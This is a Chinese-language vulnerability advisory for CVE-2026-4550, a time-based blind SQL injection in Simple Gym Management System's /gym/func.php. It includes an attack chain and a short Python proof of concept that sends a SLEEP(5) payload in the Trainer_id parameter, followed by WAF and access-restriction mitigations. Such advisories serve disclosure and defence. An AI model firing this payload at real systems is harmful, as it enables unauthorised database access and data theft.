CVE-2026-4550 CVSS 4.7 中危

CVE-2026-4550 Simple Gym Management System SQL注入漏洞

披露日期: 2026-03-22

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4550

漏洞类型

SQL注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Simple Gym Management System

漏洞概述

Simple Gym Management System 1.0及之前版本被发现存在SQL注入安全漏洞。该漏洞源于/gym/func.php文件未能正确过滤用户输入的Trainer_id或fname参数。具有高权限的远程攻击者可利用此漏洞执行任意SQL命令，从而窃取数据库敏感信息、篡改数据或影响系统可用性。鉴于漏洞利用代码已被公开披露，风险较为现实，建议管理员立即排查并修复受影响系统。

技术细节

该漏洞位于Simple Gym Management System的“/gym/func.php”文件中。由于应用程序未对传入的“Trainer_id”和“fname”参数进行严格的输入验证和过滤，导致攻击者能够构造恶意的SQL语句拼接到数据库查询中。虽然CVSS向量显示攻击需要高权限（PR:H），这意味着攻击者通常需要拥有管理员或特权账户才能利用此漏洞，但利用过程无需用户交互（UI:N）且可远程发起（AV:N）。攻击者通常采用基于时间的盲注技术，通过发送包含特定SQL延时函数（如SLEEP）的Payload，根据服务器响应时间判断SQL语句的执行结果，从而逐步提取数据库结构及敏感数据。这种类型的注入虽然获取数据的速度较慢，但隐蔽性较高。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者扫描并识别出运行Simple Gym Management System的目标服务器，确认其版本在1.0及以下。

STEP 2

步骤2: 获取权限

由于漏洞需要高权限（PR:H），攻击者通过钓鱼或暴力破解等手段获取了一个有效的管理员或高特权账户凭证。

STEP 3

步骤3: 发起攻击

攻击者使用高权限账户登录，并向/gym/func.php发送特制的HTTP请求，在Trainer_id或fname参数中注入基于时间的盲注Payload。

STEP 4

步骤4: 数据窃取

攻击者分析服务器响应时间，逐位推断数据库内容，最终获取用户名、密码哈希或其他敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target_url = "http://target-ip/gym/func.php"
# Time-Based Blind SQL Injection Payload
# Payload checks if the database pauses execution for 5 seconds.
payload = {
    "Trainer_id": "1' AND (SELECT SLEEP(5))-- -",
    "fname": "test"
}

try:
    response = requests.get(target_url, params=payload)
    # If response time is greater than 5 seconds, the SQL executed successfully.
    if response.elapsed.total_seconds() >= 5:
        print("[+] Vulnerability confirmed: SQL Injection exists.")
    else:
        print("[-] Vulnerability not detected or patched.")
except Exception as e:
    print(f"Error: {e}")

影响范围

Simple Gym Management System <= 1.0

防御指南

临时缓解措施

在未升级补丁前，建议通过服务器配置限制对/gym/func.php的直接访问，或部署Web应用防火墙（WAF）检测并阻断包含单引号、SLEEP()等SQL注入特征的流量。同时，加强后台管理员账户的安全策略，防止凭证泄露，增加攻击者的利用门槛。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表